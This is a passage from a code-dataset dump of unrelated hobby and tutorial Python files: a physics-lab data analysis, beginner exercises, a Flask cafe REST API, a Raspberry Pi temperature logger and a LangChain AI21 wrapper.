str(i+1) + '.csv'))\n \n \n##################################\n# LIMPEZA DOS DADOS #\n##################################\n \n########## Bloco em rampa #########\n \ntmin_r = [4.7, 2.9, 6.2, 4.6, 4.5] # tempos iniciais estimados (s)\n\nfor i in range(5):\n # removendo variáveis que não serão utilizadas\n r[i] = r[i].filter(items=['time', 'gFx'])\n r[i].columns = ['time', 'a']\n # removendo dados antes do tempo inicial estimado\n r[i] = r[i].loc[r[i]['time'] >= tmin_r[i]]\n r[i] = r[i].reset_index(drop = True)\n # convertendo valores para m/s^2\n r[i].update(pd.Series(r[i]['a'] * g, name = 'a')) \n # 'zerando' o tempo\n r[i].update(pd.Series(r[i]['time'] - tmin_r[i], name = 'time'))\n # calculando as velocidades experimentais\n r[i]['v'] = integrate(r[i]['time'], r[i]['a'])\n # calculando o deslocamento experimental\n r[i]['d'] = integrate(r[i]['time'], r[i]['v'])\n # filtrando dados com deslocamento maior que o tamanho total da rampa\n r[i] = r[i].loc[r[i]['d'] <= D]\n \n############### MCU ###############\n \nfor i in range(5):\n c[i]['theta'][0] = 1*math.pi\n c[i]['theta'][1] = 2*math.pi\n for j in [2, 4]:\n c[i]['theta'][j] = (j+1)*math.pi\n c[i]['theta'][j+1] = (j+2)*math.pi\n c[i]['time'][j] += c[i]['time'][j-1]\n c[i]['time'][j+1] += c[i]['time'][j-1]\n c[i]['w'] = derivate(c[i]['time'], c[i]['theta'], y0 = c[i]['theta'][0] / c[i]['time'][0])\n \n############# Pêndulo #############\n \ntmin_p = [7.05, 5.15, 5.2, 5.15, 5.3] # tempos iniciais estimados (s)\n\nfor i in range(5):\n # removendo variáveis que não serão utilizadas\n p[i] = p[i].filter(items=['time', 'wx'])\n p[i].columns = ['time', 'w']\n # removendo dados fora do intervalo alvo\n p[i] = p[i].loc[(p[i]['time'] >= tmin_p[i]) & (p[i]['time'] <= tmin_p[i] + 30)]\n p[i] = p[i].reset_index(drop = True)\n # 'zerando' o tempo\n p[i].update(pd.Series(p[i]['time'] - tmin_p[i], name = 'time'))\n # calculando a inclinação experimental\n p[i]['theta'] = integrate(p[i]['time'], p[i]['w'])\n # estimando a inclinação inicial\n theta0.append(-max(p[i]['theta']) / 2)\n # recalculando a inclinação experimental\n p[i].update(pd.Series(integrate(p[i]['time'], p[i]['w'], y0 = theta0[i]), name = 'theta'))\n # calculando a aceleração angular\n p[i]['a'] = derivate(p[i]['time'], p[i]['w'], y0 = g * math.sin(theta0[i]) / L)\n\n##################################\n# GRAFICOS EXPERIMENTAIS #\n##################################\n\n########## Bloco em rampa ######### \n\nplot_experimentos(r, ['d', 'v', 'a'], labels = ['Deslocamento Linear', 'Velocidade Linear', 'Aceleração Linear'], units = ['m', 'm/s', r'm/s$^2$'], exp = 'Bloco em Rampa')\n\n############### MCU ###############\n\nplot_experimentos(c, ['theta', 'w'], labels = ['Deslocamento Angular', 'Velocidade Angular'], units = ['rad', 'rad/s'], exp = 'Movimento Circular Uniforme')\n\n############# Pêndulo ############# \n\nplot_experimentos(p, ['theta', 'w', 'a'], labels = ['Deslocamento Angular', 'Velocidade Angular', 'Aceleração Angular'], units = ['rad', 'rad/s', r'rad/s$^2$'], exp = 'Movimento Pendular')\n\n##################################\n# MODELO #\n##################################\n\nre = r[0]\nce = c[0]\npe = p[0]\n\nfor i in range(1,5):\n re = re.append(r[i], ignore_index = True)\n ce = ce.append(c[i], ignore_index = True)\n pe = pe.append(p[i], ignore_index = True)\n\n########## Bloco em rampa #########\n\nBr = par * Ar / mr * 4\nAr = g * math.sin(thetar)\n\ntmax = max(re['time'])\n\ndt = 0.001\n\neur1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'd' : 0.0,\n 'v' : 0.0,\n 'a' : 0.0})\n\neur1['d'][0] = 0.0\neur1['v'][0] = 0.0\neur1['a'][0] = Ar\n \nfor i in range(1, len(eur1)):\n eur1['d'][i] = eur1['d'][i-1] + eur1['v'][i-1] * dt\n eur1['v'][i] = eur1['v'][i-1] + eur1['a'][i-1] * dt\n eur1['a'][i] = Ar - Br * eur1['v'][i] ** 2\n\neur2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'd' : 0.0,\n 'v' : 0.0,\n 'a' : 0.0})\n\neur2['d'][0] = 0.0\neur2['v'][0] = 0.0\neur2['a'][0] = Ar\n \nfor i in range(1, len(eur2)):\n vmid = eur2['v'][i-1] + eur2['a'][i-1] * dt / 2\n amid = Ar - Br * vmid ** 2\n eur2['v'][i] = eur2['v'][i-1] + amid * dt\n eur2['d'][i] = eur2['d'][i-1] + vmid * dt\n eur2['a'][i] = Ar - Br * eur2['v'][i] ** 2\n \nerro(re, eur1, eur2, 'd')\nerro(re, eur1, eur2, 'v')\nerro(re, eur1, eur2, 'a')\n\n\n############### MCU ###############\n\nwc = np.mean(ce['w'])\n\ntmax = max(ce['time'])\n \neuc1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0})\n\neuc1['theta'][0] = 0.0\n \nfor i in range(1, len(euc1)):\n euc1['theta'][i] = euc1['theta'][i-1] + wc * dt\neuc1['w'] = wc\n\neuc2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0})\n\neuc2['theta'][0] = 0.0\n \nfor i in range(1, len(euc2)):\n euc2['theta'][i] = euc2['theta'][i-1] + wc * dt\neuc2['w'] = wc\n \nerro(ce, euc1, euc2, 'theta')\nerro(ce, euc1, euc2, 'w')\n\n############# Pêndulo #############\n\nBp = par * Ap * L / mp\nthetap0 = np.mean(theta0)\nAp = g / L\n\ntmax = max(pe['time'])\n\neup1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0,\n 'w' : 0.0,\n 'a' : 0.0})\n\neup1['theta'][0] = thetap0\neup1['w'][0] = 0.0\neup1['a'][0] = - Ap * math.sin(thetap0)\n \nfor i in range(1, len(eup1)):\n eup1['theta'][i] = eup1['theta'][i-1] + eup1['w'][i-1] * dt\n eup1['w'][i] = eup1['w'][i-1] + eup1['a'][i-1] * dt\n eup1['a'][i] = -Ap * math.sin(eup1['theta'][i]) - Bp * eup1['w'][i] * abs(eup1['w'][i])\n\neup2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0,\n 'w' : 0.0,\n 'a' : 0.0})\n\neup2['theta'][0] = thetap0\neup2['w'][0] = 0.0\neup2['a'][0] = - Ap * math.sin(thetap0)\n \nfor i in range(1, len(eup2)):\n thetamid = eup2['theta'][i-1] + eup2['w'][i-1] * dt / 2\n wmid = eup2['w'][i-1] + eup2['a'][i-1] * dt / 2\n amid = -Ap * math.sin(thetamid) - Bp * wmid * abs(wmid)\n eup2['theta'][i] = eup2['theta'][i-1] + wmid * dt\n eup2['w'][i] = eup2['w'][i-1] + amid * dt\n eup2['a'][i] = -Ap * math.sin(eup2['theta'][i]) - Bp * eup2['w'][i] * abs(eup2['w'][i])\n \nerro(pe, eup1, eup2, 'theta')\nerro(pe, eup1, eup2, 'w')\nerro(pe, eup1, eup2, 'a')\n \n \n##################################\n# GRAFICOS #\n##################################\n\n########## Bloco em rampa #########\n\nplot_modelos(re, eur1, eur2, ['d', 'v', 'a'], labels = ['Deslocamento Linear', 'Velocidade Linear', 'Aceleração Linear'], units = ['m', 'm/s', r'm/s$^2$'], exp = 'Bloco em Rampa')\n\n############### MCU ###############\n\nplot_modelos(ce, euc1, euc2, ['theta', 'w'], labels = ['Deslocamento Angular', 'Velocidade Angular'], units = ['rad', 'rad/s'], exp = 'Movimento Circular Uniforme')\n\n############# Pêndulo ############# \n\nplot_modelos(pe, eup1, eup2, ['theta', 'w', 'a'], labels = ['Deslocamento Angular', 'Velocidade Angular', 'Aceleração Angular'], units = ['rad', 'rad/s', r'rad/s$^2$'], exp = 'Movimento Pendular')\n","repo_name":"SisiBakaMuyo/mac0209","sub_path":"EP2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34726769339","text":"alien_0 = {'color':'green','point':5}\nalien_1 = {'color':'red','point':15}\nalien_2 = {'color':'yellow','point':10}\naliens = [alien_0,alien_1,alien_2]\nprint('# 列表中存字典')\nfor alien in aliens:\n print(alien)\n\nprint('\\n# 10个外星人')\naliens=[]\nfor i in range(10):\n newAlien = {'speed':'slow','color':'green','point':5}\n aliens.append(newAlien)\n\nfor alien in aliens:\n print(alien)\nprint(len(aliens))\n\nprint('\\n# 改变前3个外星人的属性')\nfor alien in aliens[:3]:\n alien['color']='yellow'\n alien['speed']='medium'\n alien['point']=10\n\nfor alien in aliens:\n print(alien)\n\nprint('\\n# 字典中存列表````')\nprint(\"name_language = {\\n'me':['js','python'],\\n'fay':['java','js']\\n}\")\n\nname_language = {\n 'me':['js','python'],\n 'fay':['java','js'],\n 'lool':['java']\n}\nfor name,language in name_language.items():\n print(name)\n for l in language:\n print('\\t' + l)\n\nprint('\\n# 字典中存字典')\nusers ={\n 'Messie':{\n 'first':'Zhang',\n 'last':'Messie',\n 'location':'China'\n },\n\n 'Kaka':{\n 'first':'Sheng',\n 'last':'kaka',\n 'location':'Brazil'\n },\n}\nusers['C_ronarido'] = {\n 'first':'Stiyano',\n 'last':'C_ronarido',\n 'location':'Potora',\n}\nfor name,info in users.items():\n print('\\nPlayer name is ' + name)\n print('Player full name is ' + info['first'] + info['last'])\n print('Player is from ' + info['location'])\n","repo_name":"zd6515843/super_chen","sub_path":"PythonSelfStudy/Lession01-09/lession_06_嵌套.py","file_name":"lession_06_嵌套.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32148721843","text":"import requests\nimport logging\nimport os\n\n\ndef post_to_server(video_title, accuracy, warning):\n # http://183.81.35.24:5010/api/msg_warning/Update?title=Em giờ nơi ấy có ổn không ? Em ừ đi anh thấy yên lòng ~ huy Vạc cover hay nhất 2019&accuracy=10&timer=12\n headers = {'content-type': 'application/json'}\n url = 'http://183.81.35.24:5010/api/msg_warning/Update'\n params = {'title': video_title, 'accuracy': accuracy, 'timer': '0', 'warning': warning}\n print(params)\n # req = requests.post(url, params=params, headers=headers)\n\n\nloggers_dict = {}\n# Logging\nLOGLEVEL = 20 # logging.INFO\nLOG_FORMAT = \"%(name)-20s %(levelname)-8s %(message)s\"\nFILE_LOGLEVEL = 10 # logging.DEBUG\nFILE_LOG_FORMAT = \"%(asctime)s %(name)-20s %(levelname)-8s %(message)s\"\n\n\n# --- Logging utilities --------------------------------------------------------\ndef add_file_handler(logger, log_filepath, loglevel=FILE_LOGLEVEL,\n log_format=FILE_LOG_FORMAT):\n \"\"\"Add a file handler to the logger.\"\"\"\n file_handler = logging.FileHandler(log_filepath)\n file_handler.setLevel(loglevel)\n file_handler.setFormatter(logging.Formatter(log_format))\n logger.addHandler(file_handler)\n\n\ndef setup_loggers(log_dir, loglevel=FILE_LOGLEVEL, log_format=FILE_LOG_FORMAT):\n \"\"\"Setup the loggers with file handlers.\"\"\"\n for name in logging.Logger.manager.loggerDict.keys():\n if name.startswith('music'):\n add_file_handler(\n logging.getLogger(name), os.path.join(log_dir, name + '.log'),\n loglevel, log_format)\n","repo_name":"Minh112/Check_copyright_video","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"4142736270","text":"import math\r\nnum1= int(input (\"numero por favor \"))\r\nnum2= int(input (\"numero por favor \"))\r\n\r\ntop=num2+1\r\n\r\nfor x in range(num1, top):\r\n verificador=0\r\n num=(x)\r\n raiz= int(math.sqrt(num)+1)\r\n for i in range (2,raiz):\r\n divisor= num%i\r\n if divisor==0:\r\n verificador+=1\r\n \r\n if verificador==0:\r\n print (\"El numero \" + format(num) + \" es primo y tiene \" + format(verificador) +\" divisores\")\r\n\r\n else:\r\n print (\"El numero \" + format(num) + \" no es primo\")\r\n","repo_name":"bibliofilica/NumerosPrimos","sub_path":"primo rango.py","file_name":"primo rango.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72225623902","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n# Graficas de los pulsos en los canales adquiridos.\n# Los archivos a analizar pueden tener la extensión .dat o .bz2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nN=5000 # Número de puntos a graficar\n\ndata_dir = 'data/' # Directorio donde se encuentran los datos\nplot_dir = 'plot/' # Directorio donde se guardaran las graficas\nfilename = input('Ingrese el nombre del archivo (*.dat o *.bz2) a procesar : ')\n#filename= 'spnk_nogps_2021_07_23_03h00.dat.bz2' # Nombre del archivo a graficar\n\nch1, ch2 = np.loadtxt(os.path.join(data_dir, filename), unpack=1, dtype=int)\n\nx=np.linspace(0,N,N-1)\nfig,ax = plt.subplots(nrows=1, ncols=1, figsize=(11,7))\n\nax.step(x,ch1[:N-1], 'r-.',lw=1, label='CH1')\nax.step(x,ch2[:N-1], 'b.-',lw=1, label='CH2')\n\n#ax.plot(ch1, 'r-o',lw=1, label='CH1')\n#ax.plot(ch2, 'b.-',lw=1, label='CH2')\n\nax.legend(fontsize=11)\nax.grid()\nax.set_xlim(0,1500)\nax.set_ylabel('Amplitude (ADC)',fontsize=14)\nax.set_xlabel('Time (ADC.bin)',fontsize=14)\n\nplt.savefig(os.path.join(plot_dir,'pulses_{}.png'.format(filename)))\nplt.show()\n\n","repo_name":"lharnaldi/acq_scripts","sub_path":"python/0_channels.py","file_name":"0_channels.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"3136789307","text":"import flask.json\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy # pip install Flask-SQLAlchemy\nimport random\nimport json\nimport os\n\n# The API documentation is viewable at https://documenter.getpostman.com/view/15623189/TzRNEV41\n\n\nAPI_KEY = \"MySecretAPIKey\"\nFILE_URL = 'sqlite:///database/cafes.db'\napp = Flask(__name__)\n\n\"\"\"\n DEFAULT FLASK APP CONFIGURATION\n ===============================\n default_config = {\n 'APPLICATION_ROOT': '/',\n 'DEBUG': None,\n 'ENV': None,\n 'EXPLAIN_TEMPLATE_LOADING': False,\n 'JSONIFY_MIMETYPE': 'application/json',\n 'JSONIFY_PRETTYPRINT_REGULAR': False,\n 'JSON_AS_ASCII': True,\n 'JSON_SORT_KEYS': True,\n 'MAX_CONTENT_LENGTH': None,\n 'MAX_COOKIE_SIZE': 4093,\n 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days = 31),\n 'PREFERRED_URL_SCHEME': 'http',\n 'PRESERVE_CONTEXT_ON_EXCEPTION': None,\n 'PROPAGATE_EXCEPTIONS': None,\n 'SECRET_KEY': None,\n 'SEND_FILE_MAX_AGE_DEFAULT': None,\n 'SERVER_NAME': None,\n 'SESSION_COOKIE_DOMAIN': None,\n 'SESSION_COOKIE_HTTPONLY': True,\n 'SESSION_COOKIE_NAME': 'session',\n 'SESSION_COOKIE_PATH': None,\n 'SESSION_COOKIE_SAMESITE': None,\n 'SESSION_COOKIE_SECURE': False,\n 'SESSION_REFRESH_EACH_REQUEST': True,\n 'TEMPLATES_AUTO_RELOAD': None,\n 'TESTING': False,\n 'TRAP_BAD_REQUEST_ERRORS': None,\n 'TRAP_HTTP_EXCEPTIONS': False,\n 'USE_X_SENDFILE': False\n }\n\"\"\"\n\n# Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = FILE_URL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n# Cafe TABLE Configuration\nclass Cafe(db.Model):\n __tablename__ = \"Cafes\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n # Angela's method: Convert database record to a dictionary\n def to_dict(self):\n # # Method 1.\n # dictionary = {}\n # # Loop through each column in the data record\n # for column in self.__table__.columns:\n # # Create a new dictionary entry;\n # # where the key is the name of the column\n # # and the value is the value of the column\n # dictionary[column.name] = getattr(self, column.name)\n # return dictionary\n\n # Method 2. Alternatively use Dictionary Comprehension to do the same thing.\n return {column.name: getattr(self, column.name) for column in self.__table__.columns}\n\n\n# Create the database file and tables\nif not os.path.isfile(FILE_URL):\n db.create_all()\n\n\n# HOME PAGE\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n \n\n# HTTP GET - Read Records\n\n@app.route(\"/random\", methods=[\"GET\"])\ndef get_random_cafe():\n # get a random cafe from the database\n # Select all results from the search \n all_cafes = db.session.query(Cafe).all()\n random_cafe = random.choice(all_cafes)\n # Turn the random cafe SQLAlchemy Object into a JSON Response object\n\n # # The original manual dictionary method\n # cafe = {\n # 'id': random_cafe.id,\n # 'name': random_cafe.name,\n # 'map_url': random_cafe.map_url,\n # 'img_url': random_cafe.img_url,\n # 'location': random_cafe.location,\n # 'seats': random_cafe.seats,\n # 'has_toilet': random_cafe.has_toilet,\n # 'has_wifi': random_cafe.has_wifi,\n # 'has_sockets': random_cafe.has_sockets,\n # 'can_take_calls': random_cafe.can_take_calls,\n # 'coffee_price': random_cafe.coffee_price,\n # }\n # return jsonify(cafe=cafe)\n\n # # This method saves me having to manually type out the dictionary\n # cafe = jsonify(\n # # jsonify the dictionary\n # cafe=jsonify(\n # # jsonify the cafe data\n # id=random_cafe.id,\n # name=random_cafe.name,\n # map_url=random_cafe.map_url,\n # img_url=random_cafe.img_url,\n # location=random_cafe.location,\n # seats=random_cafe.seats,\n # has_toilet=random_cafe.has_toilet,\n # has_wifi=random_cafe.has_wifi,\n # has_sockets=random_cafe.has_sockets,\n # can_take_calls=random_cafe.can_take_calls,\n # coffee_price=random_cafe.coffee_price,\n # ).json # convert the Response object to a dictionary\n # )\n # return cafe\n\n # Even better solution from Angela: add to_dict() function to the class\n # Simply convert the random_cafe data record to a dictionary of key-value pairs.\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=random_cafe.to_dict()), 200\n\n\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all_cafes():\n # get all cafes from the database\n # Select all results from the search \n all_cafes = db.session.query(Cafe).all()\n # combine into a list of dictionaries\n all_cafes_dict = [cafe.to_dict() for cafe in all_cafes]\n \"\"\"\n {\n \"all_cafes\": [\n {\n \"can_take_calls\": true, \n \"coffee_price\": \"\\u00a32.40\", \n \"has_sockets\": true, \n \"has_toilet\": true, \n \"has_wifi\": false, \n \"id\": 1, \n \"img_url\": \"https://atlondonbridge.com/wp-content/uploads/2019/02/Pano_9758_9761-Edit-190918_LTS_Science_Gallery-Medium-Crop-V2.jpg\", \n \"location\": \"London Bridge\", \n \"map_url\": \"https://g.page/scigallerylon?share\", \n \"name\": \"Science Gallery London\", \n \"seats\": \"50+\"\n }, \n ...\n ]\n }\n \"\"\"\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=all_cafes_dict), 200\n\n\n@app.route(\"/search\", methods=[\"GET\"])\ndef find_cafes():\n # Get value from URL query string e.g. http://127.0.0.1:5006/search?loc=Peckham\n # https://flask.palletsprojects.com/en/1.1.x/api/#flask.Request.args\n location = request.args.get('loc')\n # Select all results from the search \n found_cafes = db.session.query(Cafe).filter_by(location=location).all()\n if found_cafes:\n # combine into a list of dictionaries\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=[cafe.to_dict() for cafe in found_cafes]), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": \"Sorry, we don't have a cafe at that location.\"}), 404\n\n\n# HTTP POST - Create Record\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add_cafe():\n def check_bool(value):\n return 1 if value == '1' or value.lower() == 'true' else 0\n\n # Get field values from request body and create a new Cafe object\n # request.form returns an immutable dictionary (ImmutableMultiDict)\n # the boolean values must be blank, 0 or 1\n data = request.form\n new_cafe = Cafe(\n name=data['name'],\n map_url=data['map_url'],\n img_url=data['img_url'],\n location=data['location'],\n seats=data['seats'],\n has_toilet=check_bool(data['has_toilet']),\n has_wifi=check_bool(data['has_wifi']),\n has_sockets=check_bool(data['has_sockets']),\n can_take_calls=check_bool(data['can_take_calls']),\n coffee_price=data['coffee_price'],\n )\n # Check if cafe is already in the database\n # Select all results from the search \n search_cafe = db.session.query(Cafe).filter_by(\n name=new_cafe.name,\n location=new_cafe.location\n ).all()\n if search_cafe:\n # 400 \tBad Request\n # Request had bad syntax or was impossible to fulfill\n return jsonify(error={\"exists\": \"Cafe already exists.\"}), 400\n else:\n # Add cafe to database\n db.session.add(new_cafe)\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": \"Successfully added the new cafe.\"}), 200\n\n\n# HTTP PUT/PATCH - Update Record\n\n@app.route(\"/update-price/\", methods=[\"PATCH\"])\ndef update_price(cafe_id):\n # Get value from URL query string e.g. http://127.0.0.1:5006/search?loc=Peckham\n # https://flask.palletsprojects.com/en/1.1.x/api/#flask.Request.args\n new_price = request.args.get('new-price')\n # Select the first match from the search: \n cafe = db.session.query(Cafe).filter_by(\n id=int(cafe_id),\n ).first()\n # Angela used:\n # cafe = db.session.query(Cafe).get(cafe_id)\n if cafe:\n # print(\"cafe =\", cafe, type(cafe)) # >>> cafe = \n cafe.coffee_price = new_price\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": f\"Price updated to {cafe.coffee_price} for {cafe.name}.\"}), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": f\"A cafe with ID={cafe_id} was not found.\"}), 404\n\n\n# HTTP DELETE - Delete Record\n\n@app.route(\"/report-closed/\", methods=[\"DELETE\"])\ndef delete_cafe(cafe_id):\n key_data = request.form['api-key']\n if key_data == API_KEY:\n # delete the entry\n cafe = db.session.query(Cafe).get(cafe_id)\n if cafe:\n db.session.delete(cafe)\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": f\"Cafe {cafe.name} removed from database.\"}), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": f\"A cafe with ID={cafe_id} was not found.\"}), 404\n else:\n # 403 \tForbidden\n # Request does not specify the file name, or the directory\n # or the file does not have the permission that allows the pages to be viewed from the web\n return jsonify(error={\"Forbidden\": \"Not Authorized to delete a cafe.\"}), 403\n pass\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5006)\n","repo_name":"SadSack963/day-66_REST_API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"42373131995","text":"import sys\nimport os\nimport glob\nimport time\nimport json\nimport firebase_admin\n\nfrom datetime import datetime\nfrom firebase_admin import credentials\nfrom google.cloud import firestore\n\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\nproject_id = \"smart-water-168ca\"\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/home/pi/Desktop/smart-water-168ca-d9f996738e27.json\"\ncred = credentials.ApplicationDefault()\nfirebase_admin.initialize_app(cred, {\n 'projectId': project_id,\n})\ndb = firestore.Client()\n \ndef generateID():\n data = datetime.now()\n sensorBase_ref = db.collection(u'sensorBase').document()\n sensorBase_ref.set({\n \"registration\": data,\n \"location\": \"\"\n })\n return sensorBase_ref.id\n \ndef getSensorBase_id():\n overwrite = False\n id_sensorBase = 0\n \n try:\n with open('sensorBase.json', 'r') as f:\n \n jsonfile = f.read()\n sensorBase_json = json.loads(jsonfile)\n\n if sensorBase_json['id_sensorBase'] == False:\n id_sensorBase = generateID()\n overwrite = True\n else:\n id_sensorBase = sensorBase_json['id_sensorBase']\n \n except:\n id_sensorBase = generateID()\n overwrite = True\n \n if overwrite == True:\n with open('sensorBase.json', 'w+') as f: \n datastore = {\"id_sensorBase\": id_sensorBase}\n json.dump(datastore, f)\n \n return id_sensorBase\n\nidSensorBase= getSensorBase_id()\n\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n \ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n \n data = {\n \"celsius\": temp_c,\n }\n \n return data\n\nwhile True:\n\n jsonTemp = read_temp()\n data = datetime.now()\n jsonTemp['id_sensorBase'] =idSensorBase\n jsonTemp['datatime'] =data\n\n doc_base = db.collection(u'sensorBase/'+idSensorBase+\"/sensorData\")\n doc_base.add(jsonTemp)\n print(\"Deu Certo!\")\n time.sleep(10)\n\n\n","repo_name":"maathh/Water-IOT","sub_path":"Raspberry/base_monitoramento.py","file_name":"base_monitoramento.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24559822967","text":"from typing import Any, Dict, List, Optional, cast\n\nimport requests\nfrom langchain_core.callbacks import CallbackManagerForLLMRun\nfrom langchain_core.language_models.llms import LLM\nfrom langchain_core.pydantic_v1 import BaseModel, Extra, SecretStr, root_validator\nfrom langchain_core.utils import convert_to_secret_str, get_from_dict_or_env\n\n\nclass AI21PenaltyData(BaseModel):\n \"\"\"Parameters for AI21 penalty data.\"\"\"\n\n scale: int = 0\n applyToWhitespaces: bool = True\n applyToPunctuations: bool = True\n applyToNumbers: bool = True\n applyToStopwords: bool = True\n applyToEmojis: bool = True\n\n\nclass AI21(LLM):\n \"\"\"AI21 large language models.\n\n To use, you should have the environment variable ``AI21_API_KEY``\n set with your API key or pass it as a named parameter to the constructor.\n\n Example:\n .. code-block:: python\n\n from langchain_community.llms import AI21\n ai21 = AI21(ai21_api_key=\"my-api-key\", model=\"j2-jumbo-instruct\")\n \"\"\"\n\n model: str = \"j2-jumbo-instruct\"\n \"\"\"Model name to use.\"\"\"\n\n temperature: float = 0.7\n \"\"\"What sampling temperature to use.\"\"\"\n\n maxTokens: int = 256\n \"\"\"The maximum number of tokens to generate in the completion.\"\"\"\n\n minTokens: int = 0\n \"\"\"The minimum number of tokens to generate in the completion.\"\"\"\n\n topP: float = 1.0\n \"\"\"Total probability mass of tokens to consider at each step.\"\"\"\n\n presencePenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens.\"\"\"\n\n countPenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens according to count.\"\"\"\n\n frequencyPenalty: AI21PenaltyData = AI21PenaltyData()\n \"\"\"Penalizes repeated tokens according to frequency.\"\"\"\n\n numResults: int = 1\n \"\"\"How many completions to generate for each prompt.\"\"\"\n\n logitBias: Optional[Dict[str, float]] = None\n \"\"\"Adjust the probability of specific tokens being generated.\"\"\"\n\n ai21_api_key: Optional[SecretStr] = None\n\n stop: Optional[List[str]] = None\n\n base_url: Optional[str] = None\n \"\"\"Base url to use, if None decides based on model name.\"\"\"\n\n class Config:\n \"\"\"Configuration for this pydantic object.\"\"\"\n\n extra = Extra.forbid\n\n @root_validator()\n def validate_environment(cls, values: Dict) -> Dict:\n \"\"\"Validate that api key exists in environment.\"\"\"\n ai21_api_key = convert_to_secret_str(\n get_from_dict_or_env(values, \"ai21_api_key\", \"AI21_API_KEY\")\n )\n values[\"ai21_api_key\"] = ai21_api_key\n return values\n\n @property\n def _default_params(self) -> Dict[str, Any]:\n \"\"\"Get the default parameters for calling AI21 API.\"\"\"\n return {\n \"temperature\": self.temperature,\n \"maxTokens\": self.maxTokens,\n \"minTokens\": self.minTokens,\n \"topP\": self.topP,\n \"presencePenalty\": self.presencePenalty.dict(),\n \"countPenalty\": self.countPenalty.dict(),\n \"frequencyPenalty\": self.frequencyPenalty.dict(),\n \"numResults\": self.numResults,\n \"logitBias\": self.logitBias,\n }\n\n @property\n def _identifying_params(self) -> Dict[str, Any]:\n \"\"\"Get the identifying parameters.\"\"\"\n return {**{\"model\": self.model}, **self._default_params}\n\n @property\n def _llm_type(self) -> str:\n \"\"\"Return type of llm.\"\"\"\n return \"ai21\"\n\n def _call(\n self,\n prompt: str,\n stop: Optional[List[str]] = None,\n run_manager: Optional[CallbackManagerForLLMRun] = None,\n **kwargs: Any,\n ) -> str:\n \"\"\"Call out to AI21's complete endpoint.\n\n Args:\n prompt: The prompt to pass into the model.\n stop: Optional list of stop words to use when generating.\n\n Returns:\n The string generated by the model.\n\n Example:\n .. code-block:: python\n\n response = ai21(\"Tell me a joke.\")\n \"\"\"\n if self.stop is not None and stop is not None:\n raise ValueError(\"`stop` found in both the input and default params.\")\n elif self.stop is not None:\n stop = self.stop\n elif stop is None:\n stop = []\n if self.base_url is not None:\n base_url = self.base_url\n else:\n if 